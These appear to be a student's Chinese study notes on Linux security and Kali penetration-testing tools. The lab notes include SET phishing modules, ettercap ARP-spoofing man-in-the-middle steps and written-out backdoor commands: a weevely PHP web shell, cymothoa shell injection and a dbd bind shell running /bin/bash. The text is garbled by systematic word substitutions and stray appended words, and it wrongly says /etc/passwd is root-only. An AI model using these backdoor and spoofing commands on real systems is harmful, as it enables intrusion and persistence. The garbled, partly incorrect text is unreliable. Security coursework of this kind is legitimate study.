本周主要学习教材第八章
Linux操做系统结构包括Linux内核,一些GNU运行库和工具,命令行shell,图形化界面X窗口系统及相应桌面环境,其操做系统内核属于一种典型的宏结构。
Linux内核使用了虚拟文件管理VFS机制。
Linux的一个基本特色是抽象了设备的处理,全部的硬件设备都像常规文件同样看待。Linux支持三类硬件设备:字符设备,块设备和网络设备。
Linux用户信息保存在系统的/etc/passwd文件中,只对Root可读。
为了可以给不一样的应用软件,网络服务提供统一的身份认证机制,Linux系统中提供了PAM(可插入身份认证模块)。PAM支持的四种管理界面为:认证管理,帐号管理,密码管理,会话管理。
在Linux中,每一个用户的专属初始目录的默认权限为rwx------,即只有全部者用户具备浏览,删除,修改和进入的权限,执行mkdir命令所建立的目录,其默认权限为rwxr-xr-x.
支持攻击者进行自动化的远程口令猜想工具不少,比较流行的有:Brutus(最快,最灵活的远程口令猜想破解工具)。THC Hydra(很是快速的网络身份认证口令猜想工具),Cain and Abel(黑界骑兵)。
LAMP是目前最为流行的web网站构建解决方案。
Linux系统经过简单的配置“ip_forward=1”就可以以路由器模式运行,Linux内核中由net子系统的route.c来主要实现路由器的寻址与数据包的转发功能。
wireshark与tshark使用dumpcap来进行网络流量监听,在那些须要特权才能捕获网络流量的平台上,只须要dumpcap设置为运行在特权用户帐户下,而wireshark与tshark则无需特权就能够运行。
Linux系统上的用户帐户分为Root,普通用户与系统用户三大类。攻击者在获得本地受限用户访问权以后,最简单的特权提高途径就是可以破解出Root用户的口令,而后执行su或sudo命令进行提高。第二种特权提高途径是发掘并利用su或sudo程序中的安全漏洞。
Linux系统的主要审计日志集中地/var/log目录下,主要由系统核心进程,syslogd与各个网络服务提供事件审计功能。
最多见的Linux系统后门是提供远程命令行shell的访问,一般是使用netcat等后门工具在系统上运行,开放监听一个TCP端口,在接收到请求以后返回一个LInux系统shell与客户端进行交互。php
了解kali下漏洞利用工具中set工具的使用
Social Engineering Toolkit是一个开源工具,Python驱动的社会工程学渗透测试工具,提供了很是丰富的攻击向量库,是开源的社会工程学利用套件,一般结合Metas来使用。
1.打开终端:
2.输入1回车进入社会工程学攻击:
共有11个模块,分别为
3.输入1进入鱼叉式钓鱼攻击。
此攻击向量主要目的为发送存在恶意软件的钓鱼邮件,相应的payload能够选择不一样的漏洞(选项2)。
4.返回主菜单,选2进入网站攻击框架
5.选择3,进入介质感染攻击
借助Autorun.inf执行Exploit获得一个返回的shell,也能够结合Metasploit的后门。
6.建立payload和监听器
7.选择5 群发邮件攻击,支持导入列表并向列表中的每一个人发送邮件
八、基于Arduino
九、短信欺骗攻击
十、无线接入点攻击:无线接入点攻击会建立一个虚拟无线AP,经过接入点ap能够抓取全部链接进来的设备流量。
十一、二维码攻击:填入一个危险的URL,使得被攻击者扫描二维码自动访问页面中招
十二、PowerShell攻击:针对Vista以上的PowerShell攻击模块
1三、Fast-Track攻击模块java
了解kali下嗅探欺骗工具的使用,并完成中间人攻击实验,这里介绍进行ARP欺骗、DNS欺骗和嗅探以及会话劫持的方法。
一、为Kali设置开启端口转发
二、设置ssltrip
三、ettercap的准备
4.ettercap使用
打开图形化界面
选择嗅探网卡 默认eth0
打开ettercap,选择sniff选项-unified sniffing-选择网卡-hosts选项:先scan for hosts,等扫描完了选host list。
把网关安排到target1,想攻击的目标放到target2,mitm选项卡选择arp poisioning,而后start便可。
浏览器无响应,没法进入淘宝页面查看结果。
五、Dsniff套装介绍
六、会话劫持
七、图片截获
八、DNS欺骗
九、URL监控
十、下载软件监控web
了解kali权限维持工具中后门的使用,权限维持包含Tunnel工具集、Web后门、系统后门三个子类。其中系统后门与Web后门统称为后门,都是为渗透测试后,为方便再次进入系统而留下的恶意程序。
1.weevely
生成一个php后门,weevely generate test ~/1.php, test为密码,在本地生成~/1.php
查看生成的后门
后门上传到web,使用weevely链接
(1)复制后门
(2)查看目标机ip
(3)ssh链接
用ssh没法链接到目标机
(4)nano 1.php 复制生成文件内容到其中
(5)使用命令weevely http://192.168.199.149/1.php test
进行链接
生成后门
查看生成的后门
nano 2.php 复制生成文件内容到其中
上传到网站后,使用webacoo链接:webacoo -t -u http://192.168.199.149/2.php
3.Cymothoa系统后门
枚举/bin/bash进程pidcymothoa -10500 -s -0 -y 2333
(注入2333端口),若是成功,能够链接2333端口返回一个shell
4.dbd,sdb:增强版的nc
监听端:dbd -l -p 2333 -e /bin/bash -k password
攻击端:dbd 127.0.0.1 2333 -k password
5.U3-Pwn:与Metasploit Payload结合使用的工具,菜单能够单刀多针对移动光驱设备如光驱镜像,u盘等。
6.Intersect
2,列出可使用的模块
1,建立后门脚本
自动添加组件。生成一个shell
建立后门
执行后门
(1)输入./1.py -b
进行绑定
(2)使用nc命令进行链接
(3)执行成功,返回一个shellsql
了解kali权限维持中tunnel工具的使用,Tunnel工具集包含了一系列用于创建通讯隧道、代理的工具。
一、CryptCat:与dbd/sbd使用也相似。
二、DNS2TCP:
三、Iodine:与DNS2TCP相似
四、Miredo:Miredo是一个网络工具,主要用于BSD和Linux的IPV6 Teredo隧道转换,能够转换不支持IPV6的网络链接IPV6,内核中须要有IPV6和TUN隧道支持。
五、Proxychains:
内网渗透测试常常会用到一款工具,如咱们使用Meterpreter开设一个Socks4a代理服务,经过修改/etc/prosychains.conf配置文件,加入代理,便可使其余工具如sqlmap、namp直接使用代理扫描内网。
六、Proxytunnel
七、Ptunnel:借助ICMP数据包创建隧道通讯
八、Pwant:内网下经过UDP通讯
九、sslh
10.stunnel
11.udptunnelshell
了解kali下的逆向工程工具
一、Edb-Debugger
EDB(Evan's Debugger)是一个基于Qt4开发的二进制调试工具,主要是为了跟OllyDbg工具看齐,经过插件体系能够进行功能的扩充,当前只支持Linux。
二、Ollydbg
经典的Ring3级调试器,是一个动态调试工具,将IDA与SoftICE结合起来的思想。在Kali下是Wine方式运行的Ollydbg。
三、jad:java反编译工具
四、Redare2
五、Recstudio2
六、Apktool
9.Flasm
10.Javasnoop浏览器